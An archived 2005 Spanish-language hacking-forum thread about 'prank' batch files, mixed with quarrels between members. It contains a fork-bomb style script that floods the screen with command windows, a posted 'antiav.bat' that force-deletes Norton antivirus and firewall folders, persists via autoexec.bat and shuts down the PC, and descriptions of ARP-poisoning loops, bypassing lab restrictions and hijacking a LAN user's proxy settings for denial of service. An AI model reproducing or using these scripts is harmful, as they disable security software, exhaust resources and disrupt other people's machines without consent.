Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: von Newman en 27 Julio 2005, 01:18 am



Título: broma bat!!!
Publicado por: von Newman en 27 Julio 2005, 01:18 am
Hola a todos los que hacen posible este lugar!  ;D

pues andando de ocioso me di cuenta de algo con lo cual podrian gastar una broma es muy parecido a lo que posteo el compañero txomin acerca del DOS con telnet en Internet explorer http://foro.elhacker.net/index.php/topic,75508.0.html pero esto lo podes hacer sin estar conectado lo unico que es necesario son crear 2 archivos .bat y un texto.
los codigos son los siguientes:

****uno.bat*****

@echo off
START TYPE C:\texto.txt
CALL C:\uno.bat C:\dos.bat

****dos.bat*****

@echo off
CMD

esto provoca que habra demasiadas pantallas del cmd.exe con el texto que pongamos en texto.txt:

(http://img50.imageshack.us/my.php?image=bromabat4hf.png][img]http://img50.imageshack.us/img50/6343/bromabat4hf.th.png)[/URL][/img]

lo curioso es que si ponemos
Código:
CALL C:\dos.bat C:\uno.bat
solo habre una ventana, las rutas es a su gusto.
esta chido no????
esto tambien se podria usar como un ataque pero no he pensado mucho en eso.
saludos  ;D



Título: Re: broma bat!!!
Publicado por: von Newman en 27 Julio 2005, 01:23 am
creo que puse mal la imagen bueno ahi va:  :-[

(http://img50.imageshack.us/img50/6343/bromabat4hf.th.png) (http://img50.imageshack.us/my.php?image=bromabat4hf.png)

o si no cheka este link:

http://img50.imageshack.us/my.php?image=bromabat4hf.png

jejeje


Título: Re: broma bat!!!
Publicado por: lllyounghackerlll en 30 Julio 2005, 01:55 am
sorry soy nuevo en esto pero como lo puedo desactivar solo borrando el archivo bat donde lo aya puesto ?¿


Título: Re: broma bat!!!
Publicado por: zhyzura en 30 Julio 2005, 03:24 am
ujna vez ejecutado basta con que mates el proceso del bat y listo.


Título: Re: broma bat!!!
Publicado por: lllyounghackerlll en 30 Julio 2005, 03:30 am
ujna vez ejecutado basta con que mates el proceso del bat y listo.

no te entiendo lo elimino el archivo y listo a eso te refieres o no?¿


Título: Re: broma bat!!!
Publicado por: von Newman en 30 Julio 2005, 04:17 am
a lo que se refiere zhyzura es que tecnicamente es que deje de abrir ventanas, pero como abre demasiados procesos se acaba la memoria virtual y aveces te dice que hay error  cuando habre unas aproximadamente 375 paginas -que eso detiene el DoS- tendras que apagarla de modo "bruto"  :P.
también puedes abrir demasiadas pantallas del telnet o de cualquier archivo que habra desde el cmd.exe con solo cambiar la linea:
Código:
START TYPE C:\cualquiertexto.txt
por ejemplo:
Código:
START C:\telnet.exe
saludos  ;D


Título: Re: broma bat!!!
Publicado por: von Newman en 7 Agosto 2005, 07:04 am
hola, weno que les parece? a alguien se le ocurre algo pa´ hacerlo más dañino o más gracioso?
saludos


Título: Re: broma bat!!!
Publicado por: Manibal_man en 7 Agosto 2005, 18:37 pm
para mi es inutil..., es un loop de un programa...

en una maquina bien armada y configurada no pasa nada... y en una que no lo está... tampoco pasa nada practico...

Saludos


Título: Re: broma bat!!!
Publicado por: Arkan0 en 7 Agosto 2005, 20:25 pm
pues nose pero ami no me abre mas que una ventana y yasta... no me hace flood jajajajajja .mmm


Título: Re: broma bat!!!
Publicado por: Kasswed en 7 Agosto 2005, 21:45 pm
Jaja, hombre, pa una sección en una web, de bromas PC, ta bien, para un foro de hacking, Noo!!! xDDD

Saludos!


Título: Re: broma bat!!!
Publicado por: Manibal_man en 7 Agosto 2005, 21:51 pm
seps, opino igual... igualmente calculo que lo comento pensando en un flood, o algun tipo de dos ya que cuando el sistema "cae" hay muchas mas posibilidades de que queden expuestos bugs del sistema... pero no es el caso

SAludos


Título: Re: broma bat!!!
Publicado por: von Newman en 9 Agosto 2005, 01:13 am
Jaja, hombre, pa una sección en una web, de bromas PC, ta bien, para un foro de hacking, Noo!!! xDDD

Saludos!
creo que mi intencion no fue hacer reir a nadie y si no saben utilizar este bat más que pa una broma pues lastima porque modificandolo podria ser más que un D.o.S., de alguna manera mi intento fue colaborar en estimular sus cerebros pero creo que no...
pues nose pero ami no me abre mas que una ventana y yasta... no me hace flood jajajajajja .mmm
tienes que hacerlo como digo al principio no CALL C:\dos.bat C:\uno.bat por que si nmo solo abrira una
saludos


Título: Re: broma bat!!!
Publicado por: Manibal_man en 9 Agosto 2005, 04:25 am
Citar
creo que mi intencion no fue hacer reir a nadie

es raro lo que decis... porque al principio pusiste:

Citar
pues andando de ocioso me di cuenta de algo con lo cual podrian gastar una broma es muy parecido a lo que posteo el compañero txomin acerca del DOS con telnet en Internet explorer http://foro.elhacker.net/index.php/topic,75508.0.html pero esto lo podes hacer sin estar conectado lo unico que es necesario son crear 2 archivos .bat y un texto.

y aunque al principio pusiste
Citar
esto tambien se podria usar como un ataque pero no he pensado mucho en eso.

despues decis:
Citar
y si no saben utilizar este bat más que pa una broma pues lastima porque modificandolo podria ser más que un D.o.S., de alguna manera mi intento fue colaborar en estimular sus cerebros pero creo que no...

Siendo sumamente agresivo, lo cual me parece que esta de mas...

igualmente YO te comento y afirmo que en un sistema decente no sirve para nada... y que ni siquiera es remotamente posible que sea (como vos decis) "mas que un d.o.s."

Solo vine a decir esto, xq me parece que tu actitud es demasiado soberbia para el poco conocimiento en el area que tenes

espero que esto "estimule tu cerebro"


Título: Re: broma bat!!!
Publicado por: von Newman en 9 Agosto 2005, 07:40 am
Pues la soberbia no es muy de mi personalidad pero pues estando un poco enfadado pues creo que eso queda demás, no se como actuarias tu si ofendieran tus conocimientos rebajandolos a burlas, (pero creo que tolero esto un poco pues aveces llego a comprender la actitud de vosotros compañeros -gracias al libro de THE HACKER CRACKDOWN by Bruce Sterling- {se los recomiendo} y pues lo paso por alto pero hay veces que basta!, y pues tu Manibal ya van varias veces) sugiero que primero me conoscas de fondo antes "estimular mi cerebro" con sermones.
quiero aclarar que mi intención NO es ofender y finalizar este mal punto de este post dejando abierto la posibilidad de intentar colaborar con nuevas tecnicas desde un simple bat.
saludos


Título: Re: broma bat!!!
Publicado por: Manibal_man en 9 Agosto 2005, 15:59 pm
von newman!!!, lee todo el thread de vuelta... todo lo que puse antes, en amarillito, son tus palabras...

te contradecis completamente, demostras que no tenes idea, e intentas agredir a la gente con tu desconocimiento..,. y me parece muy mal. Lo voy a decir cada vez que lo vea... es asi, no me gusta la gente soberbia que conociendo el batch, y un par de paginas se cree el super hacker, mientras otros que estudian por años en universidades para conseguir malditos titulos de ingenieria todavia se consideran "en la busqueda"...

creo que si volves a postear aca deberia ser aceptando tu desconocimiento y errores, o bien pidiendo disculpa x estos

pero vuelvo a recomendarte... lee todo el thread y vas a entender mi punto

Saludos


Título: Re: broma bat!!!
Publicado por: AdReNaLiNe en 10 Agosto 2005, 16:47 pm
ola amiguitos del progresis


Vereis,nose en lo k me e ekivocao,e creao la broma .bat a partit del un texto,asin a sio como lo e echo:

e creado un texto y aki e metio lo k se mete en uno.bat lo e guardao como uno.bat en tipo todos los archivos y cuando se me crea el bat e borrao el texto k se me kea del principio,luego e creao el dos.bat poniendo dentro del texo lo que ponia en el dos.bat y e echo lo mismo,e borrao luego el texto k se me keaba,luego e creao un texto con esto es una broma dentro y lo e guardao tipo documento de texto(.txt) y lo e metio en la c:     
Bien,ahora abro el uno.bat y se me abre solo una ventana diciendo esto es una broma,solo una ventana.
Y si abro el dos.bat me sale el cmd pero sin el esto es una broma,me pueden decir en k me e ekivocado? ???



gracias a to dios  ;D


Título: Re: broma bat!!!
Publicado por: von Newman en 11 Agosto 2005, 09:50 am
que te parece si haces la broma .bat desde un solo bat haber si me explico:
@echo off
echo.
echo.
echo el texto que quieras>>archivo.txt
echo.
cd
cd\
start type C:\archivo.txt
cmd

asi de esa forma solo esta en un bat y crea el archivo.txt es más facil no?
saludos y no me considero ni soberbio ni un superhacker, no creo que deba pedir disculpas en este caso pues solo coopere con el foro, si algunos piensan que es solo un "truco de magia barata" puede que lo sea pero es lo que ofresco y no creo que sea razon para decir:
Jaja, hombre, pa una sección en una web, de bromas PC, ta bien, para un foro de hacking, Noo!!! xDDD

Saludos!
he visto preguntas y comentarios más absurdos y no es razon para humillar y burlarse de la persona.


Título: Re: broma bat!!!
Publicado por: H@T en 12 Agosto 2005, 06:30 am
Creo que se podria hacer con un simple FOR, seria menos codigo.
Con respecto a lo de pelearse en el foro me parece poco serio, no hagan esos comentarios, sinceramente uno cuando lo escribe porai no se da cuenta pero cuando otra persona lo lee es muy desagradable.
No me quiero hacer el intelectual pero lo digo por experiencia porque una vez cuando empezaba en esto de los foros, una vez insulte a una persona, me crei muy piola, pero despues cuando lo lei me senti un verdadero estupido.
Cuando publican esas cosas leanlas varias veces y veran que se arrepentiran..

Saludos, espero no les joda mi comentario


Título: Re: broma bat!!!
Publicado por: H@T en 12 Agosto 2005, 06:33 am
Se podria hacer con un simple FOR de 1 a 1000, pero no le veo mucho sentido... pero bueno porai a otro si y eso hay que respetarlo.


Título: Re: broma bat!!!
Publicado por: Manibal_man en 12 Agosto 2005, 06:41 am
Para mi ya termino el tema, dije lo queria decir y demostré lo que queria demostrar.

Nunca insulto a nadie... solo cito... y en gral es suficiente para demostrar la equivocacion con altura.

solo eso

Saludos


Título: Re: broma bat!!!
Publicado por: von Newman en 12 Agosto 2005, 08:04 am
APLAUSOS!!!! tirher tienes toda la razón con respecto al uso de los comentarios y verdaderamente no hay que darselas de genio uno sabe lo que sabe y el mayor insulto es el no insultar.
me agradaria ver como midificas este bat con el bucle y si tienes otra idea pues xfavor ponla.
saludotes!!!
PD:alguien sabe como abrir una carpeta .zip o archivo .zip desde un bat?


Título: Re: broma bat!!!
Publicado por: dArK_gAp en 12 Agosto 2005, 11:11 am
Manibal_man:
me uno a von newman en la suplica...deja de meterte con gente que ni siquiera tienes idea de lo que se han currado un post para que la gente se informe. Creo que sabrás que como buen hacker, von newman, ha entregado su aportación a la comunidad. Además realmente crees que no tiene una utilidad?...pues creo que te equivocas.
von Newman: gracias por recordarnos a todos (al menos a aquellos que hemos leido en tu post un reto) lo dañino de los bat. He encontrado en un sp2 una vulnerabilidad que podría ser explotada gracias a un rootkit o bien una backdoor previamante instalada. Mediante la "broma" modificada podemos, sin que el usuario deje de pensar que es una tontería, modificar el system.ini para que no encuentre el firewall de windows al reiniciar y lea nuestro bat2 (para eso hay que mandarle 2bats) tras cargar todos los controladores, y hacer un shutdown. Cuando reinicie el ordenador volverá a "leer la broma 2" y mediante la backdoor instalada previamente como dije en un principio, podremos controlar la shell de su máquina.
Todo esto es obvio que lo he realizado en una LAN, a la que yo pertenezco.

Un saludo

#################dArK_gAp################


Título: Re: broma bat!!!
Publicado por: Manibal_man en 12 Agosto 2005, 15:51 pm
antes dije... que ya no habia nada para aportar... pero veo que me equivoque... asi que posteo una vez mas...

no me meto con nadie... lean todo el thread y van a notar que e slo que pasa: von newman agredio a gente, cuando el desde un principio dijo que era para una broma, y que no sabia para que podia servir.

SOSTENGO que practicamente no sirve poara nada... porque el ejemplo patetico del que habla dark_gap sirve solo para una maquina sin antivirus, sin firewall real. un rootkit o una backdoor pueden descargarse sin problemas...

ESTE bat en particular no sirve para nada.

por otro lado. HACKERS??? jajajajajaj

Saludos


Título: Re: broma bat!!!
Publicado por: H@T en 12 Agosto 2005, 16:53 pm
Verdaderamente es muy simple usar el for, ya que en el cmd pones:
c:\FOR %variable IN (rango) DO comando

aca te mando un ejemplo:

c:\FOR %i IN (1,1,3) DO dir

Vas a ver que esto te lista 3 veces el directorio actual...

Para el que dice que no se puede hacer nada con un bat, te explico que un hombre de aca de Bs. As. que dio una charla de seguridad hizo con un FOR bloquear todos los usuarios de un dominio, Denegacion de Servicio, te parece una pavada???

Otra cosa yo he hecho tambien denegacion de servicio de internet en una red LAN mediante la herramienta nemesis, pero me tube que ayudar con un bat para hacerlo repetitivo, ya que sin el FOR dura pocos segundos....


Título: Re: broma bat!!!
Publicado por: dArK_gAp en 13 Agosto 2005, 15:09 pm
Exactamente tirher: programas como el nemesis no valdrían para nada en lo referido al arp, ya que windows carga cada cierto tiempo la lista arp, y aunque con el nemesis varíes la ip del router al renovar esa lista todo nuestro trabajo se va a la ***** de no ser por el comando for. Gracias a esta sencillo bat podemos hacer que la infeccion se repita cada cierto tiempo y mantener sin servicio de internet asi como otras cosas el pc al que hemos realizado el arp poisoning.

Un saludo a Los HACKERS (sisi lo digo sin ningun jeje porque se que existen por aki)

#################dArK_gAp################


Título: Re: broma bat!!!
Publicado por: Manibal_man en 13 Agosto 2005, 16:43 pm
Por dios!!! nadie lee el thread completo???
Citar
Para el que dice que no se puede hacer nada con un bat, te explico que un hombre de aca de Bs. As. que dio una charla de seguridad hizo con un FOR bloquear todos los usuarios de un dominio, Denegacion de Servicio, te parece una pavada???
si te referis a mi... te sugiero que releas el thread... nunca desmereci a LOS .BAT, eso seria una estupidez, el Batch es un muy buen lenguaje de scripts (y que quede claro.. SCRIPTS)
es decir: automatizacion de ordenes, por decirlo de alguna manera

esto es de mi otro post para los que no entendieron:
Citar
ESTE bat en particular no sirve para nada.
ok, entendieron? dije ESTE .bat, no LOS .bat, ok? ESTE, no TODOS, SOLO ESTE (uff, espero que lo entiendan porque este si es mi ultimo post al thread, ya realmente no vale la pena postear aca si algunos no pueden mantener en su cabeza el hilo)

Por favor... los ciclos for son un elemento esencial de cualquier algoritmo...

eso no quiere decir que el "flood" posteado al principio tenga algun uso importante... en este caso, el bat propuesto al principio no sirve para NADA.

please dark_gap, habla solo de lo que sabes... e intenta mantener un hilo si?

es una pena...



Título: Re: broma bat!!!
Publicado por: von Newman en 14 Agosto 2005, 07:40 am
dArK_gAp y  tirher gracias por apollarme y sobre todo por no caer en la estupides de cerrarse a  no ver lo que dije en un principio:
Citar
hola, weno que les parece? a alguien se le ocurre algo pa´ hacerlo más dañino o más gracioso?
saludos
tambien postee esto para que cambiaran el codigo y aportaran algo al hack asi que manibal creo que el que debe leer eres TU!
no nos insultes al desmerecernos, por mi parte no solo llevo unos meses en el underground soy todavia chavo y me falta mucho por aprender por el conocimiento nunca llega a su fin pero mi conocimiento lo he demostrado en mas de una ocación. Y no es que diga que sea un master hacker pero no soy lamer como piensas que soy:
Citar
esto tambien se podria usar como un ataque pero no he pensado mucho en eso.
con esto no quiere decir que no haya pensado en cosas maliciosas ¿pero que acaso no es de lamers pensar así??
luego escribes esta verdadera estupides:
Citar
SOSTENGO que practicamente no sirve poara nada... porque el ejemplo patetico del que habla dark_gap sirve solo para una maquina sin antivirus, sin firewall real. un rootkit o una backdoor pueden descargarse sin problemas...
jajajaja por eso este bello lenguaje nos da la solución:
**antiav.bat**
*---------------------------------------------*
@echo
cd
cd\
del /f /q /s C:\"Archivos de programas"\"Norton AntiVirus"
del /f /q /s C:\"Archivos de programas"\"Norton Persona Firewall"
cls
cd\antiav.bat>>autoexec.bat
shutdown /s /t /f /c "con esto se comprueba que la seguridad es matada por un simple bat"
*----------------------------------------------------*
lo del bucle con for como dije es buena idea y como dijiste crea un D.o.S. imaginense si x cada pantalla abierta nos mandara 5 centavos seraia genial! pero logico que no solo con un bat  es ahí donde quise que propusieran ideas.
Citar
please dark_gap, habla solo de lo que sabes... e intenta mantener un hilo si?

es una pena...
dark_gap??? ? creo que TU nos das pena, alguien de mente tan cerrada (y no diras que como sabes si nio me conoces por que lo has demostrado).

creo que hay más personas como dArK_gAp y  tirher que querran colaborar.

saludos

PD: tadavia me sigo riendo
Citar
SOSTENGO que practicamente no sirve poara nada... porque el ejemplo patetico del que habla dark_gap sirve solo para una maquina sin antivirus, sin firewall real. un rootkit o una backdoor pueden descargarse sin problemas...
jajajajajajajajajajajajajaja luego pongo un ejemplo de una backdoor con un bat para que me de más risa


Título: Re: broma bat!!!
Publicado por: Manibal_man en 14 Agosto 2005, 18:35 pm
por favor...


Título: Re: broma bat!!!
Publicado por: von Newman en 15 Agosto 2005, 01:56 am
Citar
Para mi ya termino el tema, dije lo queria decir y demostré lo que queria demostrar.
ya!!!!!
Citar
por favor...


Título: Re: broma bat!!!
Publicado por: dArK_gAp en 19 Agosto 2005, 16:54 pm
De nada, creo que poca gente tiene idea de lo dañinos que son los bat. De hecho el menor fallo en uno de los bat de carga de windows....pero bueno seguid pensando que el mundo acaba donde lo hacen vuestros ojos.
Von Newman: sigue así, y por favor comparte tus avances futuros con la comunidad aun a pesar de que exista gente que te intente hacer caer.

Un saludo

################dArK_gAp#################


Título: Re: broma bat!!!
Publicado por: cool0 en 30 Agosto 2005, 18:47 pm
Creo que se te paso la mano Manibal_man , no creo que fue un post soberbio si estoy convencido que prefieres respaldar la burla de tus compañeros, a la cual no te referiste,si vamos a criticar lo incorrecto dentro del foro debemos hacerlo de forma imparcial.

NOTA: LA UNIVERSIDAD ES UNA ELECCIÓN DE APRENDISAJE AL IGUAL QUE CUALQUIER OTRA FORMA Y NO ES ALGO SUBLIME O DE ALABAR Y CREO QUE AL HACKING PODRÍA COMPLEMENTARLO Y NADA MAS.



Título: Re: broma bat!!!
Publicado por: von Newman en 2 Septiembre 2005, 03:42 am
pues gracias dArK_gAp prometo seguir ayudando en lo que pueda a este foro y muy pronto (ya estaran hartos)con la pagina web pues se dara más de que hablar.
gracias tambien cool0, aqui en México es la UNAM quien nos ofrece esa idea de elegir el aprendizage (los que son del poli no se molesten)
saludotes!!!


Título: Re: broma bat!!!
Publicado por: H@T en 3 Septiembre 2005, 17:47 pm
Porai es una pavada pero tal vez les sirva, el otro dia me acabo de dar cuenta que en los laboratorios de mi universidad, que poseen politicas, existe algo muy facil de hacer y que desconocia......

En las pc estan restringidas muchas cosas y como por ejemplo el "ejecutar", es decir que no puedo abrir un cmd, pero probe haciendo un *.bat que simplemente tenga start dentro o tambien pueden poner cmd y listo, muy facil no?

Tas vez es una pavada pero la desconocia......
Espero no se ofendan si es muy tonto y que les guste si no se les habia ocurrido...

Si conocen algun otro tipo de pasar las potiticas me chiflan..
bye


Título: Re: broma bat!!!
Publicado por: von Newman en 4 Septiembre 2005, 00:32 am
pues no es pavada, con algo tan simple lograste borlar la seguridad, aunque si es cierto que hay demás maneras de hacerlo
saludos


Título: Re: broma bat!!!
Publicado por: H@T en 4 Septiembre 2005, 00:38 am
Conoces otras???
Pues postealas..............


Título: Re: broma bat!!!
Publicado por: von Newman en 4 Septiembre 2005, 01:43 am
pues depende de muchas cosas por ejemplo si borran algo pues ni los .bat te sirven jajaja,


Título: Re: broma bat!!!
Publicado por: H@T en 4 Septiembre 2005, 16:58 pm
Como si borran algo, no entendi lo que quisiste poner Neuman, a que te referis con eso?


Título: Re: broma bat!!!
Publicado por: von Newman en 6 Septiembre 2005, 05:29 am
un ejemplo muy tonto quizas: si borran la notepad.exe un bat no lo abre por que no esta dentro de la makina  -suponiendo que la hayan borrado completamente-, no funcionaria esto:
@echo off
cd
cd\
start notepad.exe

no se si ya me entendiste?
saludos


Título: Re: broma bat!!!
Publicado por: H@T en 6 Septiembre 2005, 20:29 pm
No entendi que pusiste poner


Título: Re: broma bat!!!
Publicado por: von Newman en 10 Septiembre 2005, 04:42 am
mmmm.... pues es como decir que voy a comer pastel que esta en el refrigerador (pues siempre debe aver uno jajajaja) pero mi "big brother" se lo ha tragado el muy maldito! por logica ya me chingue y no como0 nada hasta que vaya a comprar uno de chocolate y lo reemplaze
espero con esto ser más claro jajajaja
saludos


Título: Re: broma bat!!!
Publicado por: H@T en 17 Septiembre 2005, 17:26 pm
Hola muchachada, como andan...

El otro dia probando unas pavadas se me ocurrio crear un bat que cambie el proxy de un usuario en una LAN, ya que busque en el registro y encontre donde lo guarda, pero el problema es el siguiente:

Mediante el comando "REG ADD" que agrega claves en el registro, era modificar la clave del proxy

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings

lo que pasa es que puedo agregar una clave perfectamente si posee una palabra o es mas muchas palabras pero juntas, el problema es cuando quiero agregar en la clave "Internet Settings" esta separada por espacios y no me la toma, es decir quiero que alguien me ayude, tambien probe mediante alt+Nro que me crea el espacio pero no funciona....

Otra cosa que no se hacer y que tal vez alguien sepa quisiera hacer como una opcion que tiene el netcat que es la "-d" que es ocultar la ventana del DOS para que no se vea, bueno espero que les sirva de algo y me ayuden...., porque se podria hacer un FOR que ejecute ocultamente y cambie el proxy continuamente asi se puede hacer una denegacion de servicios del navegador.....

Ya se que es una pavada pero porai a alguien le sirve y se prende y me ayuda

bye


Título: Re: broma bat!!!
Publicado por: xabo en 18 Septiembre 2005, 03:17 am
Hola soy nuevo en esto, mejor dicho no tengo ni idea :), pero intento apreder.

por eso queria preguntaros algunas cosillas ya que vosotros estais puestosen el tema.

para que sirve eso de los .bat  como va la cosa, y originalmente para que se usaban?

he intentado entederlo leyendo todos los post del hilo pero no me entero muy bien :)

si es una pregunta estupida me lo decis,

PD. creo que a lo largo del hilo las cosas que ha dicho von Newman tenian mas sentido que las de Manibal_man.

es sol una opinion ;)


Título: Re: broma bat!!!
Publicado por: H@T en 18 Septiembre 2005, 03:56 am
No existe una pregunta estupida, estupida es la gente que no pregunta y se queda callada, eso lo lei de algun lado, no es mia la frase pero me encanta.....

Leete este post:

http://foro.elhacker.net/index.php/topic,18148.0.html


Título: Re: broma bat!!!
Publicado por: von Newman en 19 Septiembre 2005, 00:26 am
pues... lo pusiste entre comillas? se supone que lo deberia de hacer como dices, ami me pone que es una línea muy grande de comandos...
para dejarlo oculto.... lo habia visto que se puede modificandolo con regedit pero no le entiendo, deja busco la info.
 saludos

PD:gracias xabo estoy pa ayudarte cuando tengas dudas saludos


Título: Re: broma bat!!!
Publicado por: H@T en 19 Septiembre 2005, 01:22 am
Si si, probe con y sin comillas, es mas si pongo todo junto me deja pero el problema es poner palabras separadas y yo necesito ponerlo en esa clave...

Dale pasame lo que encuentres..
Gracias
bytes


Título: Re: broma bat!!!
Publicado por: von Newman en 23 Septiembre 2005, 08:27 am
tirther creo que en definitiva es todo junto pues no he visto ninguna clave de registro con espacios, talvez con guion bajo pero no creo que haya otra forma
¿si lo pones todo junto, en que es en lo que falla?
saludos


Título: Re: broma bat!!!
Publicado por: von Newman en 23 Septiembre 2005, 09:12 am
hola!!!!
bueno me acabo de encontrar con esto:
http://www.el-hacker.com/foro/index.php/topic,36010.0.html
habla acerca de un bat que abre la lectora de cd y en verdad estoy algo sorprendido
si funciona!!!!!
el problema es que el code no se ve, si alguien sabe como verlo porfavor comentelo
gracias y saludos!!!


Título: Re: broma bat!!!
Publicado por: von Newman en 23 Septiembre 2005, 09:17 am
mmmm creo que el link no da pero aqui esta el del programa:
http://dl5.rapidshare.de/files/5410260/10431086/abrir.bat
solo descarguenlo y taran!!!!
saludos!


Título: Re: broma bat!!!
Publicado por: H@T en 24 Septiembre 2005, 00:29 am
tirther creo que en definitiva es todo junto pues no he visto ninguna clave de registro con espacios, talvez con guion bajo pero no creo que haya otra forma
¿si lo pones todo junto, en que es en lo que falla?
saludos

Todo junto funciona pero me crea una nueva clave que no tiene nada que ver con lo que quiero hacer, pero yo quiero una clave que ya existe y se llama "Internet Settings" y esta separada por espacio....

O yo estoy loco o buscaste mal???

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings

esta esta separada por espacio


Título: Re: broma bat!!!
Publicado por: H@T en 24 Septiembre 2005, 00:32 am
Si si el bat funciona esta bueno pero me gustaria conocer el codigo, pero no esta en codigo batch pq aparece todo como cifrado, no se....

Con que puedo abrirlo para ver el codigo???


Título: Re: broma bat!!!
Publicado por: Mad Antrax en 24 Septiembre 2005, 01:48 am
Ay madre mia, que habeis hecho?

Al abrir el BAT del CD con el bloc de notas aparecen 2 letras que nos indica que tipo de archivo es, en este caso aparecen las letras MZ que corresponden a un ejecutable!!

Si renombras el abrir.bat por abrir.exe vereis que sale unn icono, es decir: Alguien ha programado el abrir.exe y lo ha renombrado a abrir.bat. Desconozco si el contenido del ejecutable SOLO abre el CD. Pero lo más seguro que se pueda tratar de algun troyano o vete tu a saber...

Antes de ejecutar cosas asi, informaros un poco. No creo que os pase nada por abrir ese EXE RENOMBRADO A BAT. Pero la proxima vez podría ser algo peor.


Título: Re: broma bat!!!
Publicado por: H@T en 24 Septiembre 2005, 02:19 am
Lo ejecute en un VMware, jeje no creo que haya pasado nada, en todo caso si hubiese pasado lo hubiese investigado y hubiese reinstalado en unos minutos...


Título: Re: broma bat!!!
Publicado por: von Newman en 26 Septiembre 2005, 07:55 am
||MadAntrax|| pues se agradece la ifo aunque:
Citar
Pero lo más seguro que se pueda tratar de algun troyano o vete tu a saber...
no lo creo soy muy precavido con eso Xdd además el aspy de microsoft lo verifico muy bien!!!! (primera ves algo funcionable de win)
el punto es saber el seguimiento del programa si en verdad podemos abrir una lectora de cd con batch, aunque me entere que podria estar hecho con vb o c++ o un lenguaje de alto nivel, en la red me encontre con este tipo de broma ya la habia visto pero venia en .exe y lo que no entiendo es si realmente se podra crear un bat para ejecutar acciones hacia el hadware?
saludos!



Título: Re: broma bat!!!
Publicado por: H@T en 26 Septiembre 2005, 13:14 pm
Le cambie la extension de *.bat a *.exe e igual funciono....
Estan interesantes estas cosas, pero son pavadas, me gustaria ver el codigo asi supongo que si se interactua con la lectora tambien podre interactuar con otras cosas....


Título: Re: broma bat!!!
Publicado por: von Newman en 26 Septiembre 2005, 23:14 pm
Citar
si se interactua con la lectora tambien podre interactuar con otras cosas....
asi es, se podria interactuar con otras funciones.
de un programa llamado straceNTX el cual es una utilidad que rastrea las "llamadas" que realiza cada proceso, pudiendo analizar un archivo ejecutable o un proceso en ejecución.

Interesante para obtener información útil para solucionar un problema determinado de tu programa o simplemente para analizarlo.

Es una función similar al "strace" de Linux.

me da esto: (es solo un fragmento)

*-------------------------------------------------------------------*
(http://img136.imageshack.us/img136/1308/stracent9vn.th.png) (http://img136.imageshack.us/my.php?image=stracent9vn.png)
*--------------------------------------------------------------------*
que en realidad no se bien que signifique xDDDD jeje
lo pueden descargar de mi web para xp:
http://hack-2600.webcindario.com/stracentx.exe
o:
http://stracent.softonic.com/ie/42826
saludos!!!



Título: Re: broma bat!!!
Publicado por: Mad Antrax en 29 Septiembre 2005, 23:34 pm
Un bat no va a efectuar operaciones al hardware de un equipo. Los bats se crearon antiguamente para diseñar un script con un conjunto de comandos secuenciales, esto significa que si ponemos:

Instruccion1
Instruccion2

La Instruccion2 no se ejecutará si la Instruccion1 no se ha completado. Esto servia para las empresas dejar las operaciones de alto coste para el procesador en un bat (o batch) Por ejemplo, en un banco anotan todas las transferencias,  copias de cuenta y esas operaciones en el bacth, cuando llega la noche y los empleados se marchan ejecutan el bacth y realizan esas operaciones bancarias que tanto le cuesta a la CPU realizar y comprobar que se han realizado, es decir: Los batchs se utilizaban para automatizar una serie de comandos lineales.

Hoy en dia se usan poco, solo en algunos casos para lanzar un script de "mapeo" d eunidades de red por ejemplo. O para ejecutar una serie de comandos al iniciar sesion de usuario


Título: Re: broma bat!!!
Publicado por: von Newman en 30 Septiembre 2005, 03:42 am
estoy de acuerdo en esto:
son
Citar
conjunto de comandos secuenciales
Citar
Instruccion1
Instruccion2

La Instruccion2 no se ejecutará si la Instruccion1 no se ha completado.
pero no estoy de acuerdo en:
Citar
Hoy en dia se usan poco, solo en algunos casos para lanzar un script de "mapeo" d eunidades de red por ejemplo. O para ejecutar una serie de comandos al iniciar sesion de usuario
creo que se les puede dar un uso más profundo, y que pueden efectuar operaciones el hadware, lo interesante es:
Citar
Estan interesantes estas cosas, pero son pavadas, me gustaria ver el codigo asi supongo que si se interactua con la lectora tambien podre interactuar con otras cosas....
que es el rollo en este momento, los batch se pueden usar para muchas cosas, creo que hay que darles importancia y saberlos utilizar, pues creo que no solo sirven para
Citar
en un banco anotan todas las transferencias,  copias de cuenta y esas operaciones en el bacth, cuando llega la noche y los empleados se marchan ejecutan el bacth y realizan esas operaciones bancarias que tanto le cuesta a la CPU realizar y comprobar que se han realizado, es decir: Los batchs se utilizaban para automatizar una serie de comandos lineales.
ya se establecio un problema hay que resolverlo


Título: Re: broma bat!!!
Publicado por: H@T en 30 Septiembre 2005, 15:21 pm
Para lo que yo quiero me sirve, lo que necesito es ocultarlo, que quede ejecutando el batch pero oculto como la opcion que tiene el net cat, gracias
bytes


Título: Re: broma bat!!!
Publicado por: ObituaryPostman en 3 Octubre 2005, 21:13 pm
Hola a todos por aca:

Los .bat esos son muy interesantes yo los uso para ejecutar comandos de forma ciclica y de veras me han dado muy buen resultado........... 8)


Título: Re: broma bat!!!
Publicado por: von Newman en 4 Octubre 2005, 19:38 pm
Para lo que yo quiero me sirve, lo que necesito es ocultarlo, que quede ejecutando el batch pero oculto como la opcion que tiene el net cat, gracias
bytes
yo todavia no se el problema aunque me han dicho que se puede hacer por una clave del registro


Título: Re: broma bat!!!
Publicado por: TaN€R en 4 Octubre 2005, 19:53 pm
Citar
no te entiendo lo elimino el archivo y listo a eso te refieres o no?¿

No.
 No podras eliminarlo si dicho archivo está "corriendo"(funcionando).

Para eliminarlo, primero abre al admin de tareas(cntrol+alt+suprimir) y verás el bat ahi, te situas sobre el y das a el botón derecho del ratón y seguidamente  matas el proceso.

P.d:Hay un manual sobre los bat escrito por soplo para quien le interese, en cursos y documentación


Título: Re: broma bat!!!
Publicado por: H@T en 5 Octubre 2005, 23:12 pm
No me refiero a eliminarlo, yo lo que quiero es que cuando dejo un bat ejecutando queda la ventana de DOS lo que yo quiero es que si dejo ejecutando algo no quiero que la ventana negra del CMD no quede en pantalla, entendes???

Gracias
Bytes


Título: Re: broma bat!!!
Publicado por: TaN€R en 6 Octubre 2005, 01:25 am
Entiendo.

Quieres hacerlo oculto que no se vea la ventana...

Añade a la linea del bat esto:   - h

Esa instrucción creo recordar que ocultaba

salu2


Título: Re: broma bat!!!
Publicado por: H@T en 6 Octubre 2005, 15:40 pm
Como tendria que ser pq probe ponerlo dentro del bat y nada, luego probe ponerlo en linea de comandos:

achivo.bat -h

y tampoco funca, como seria, no me funca ???


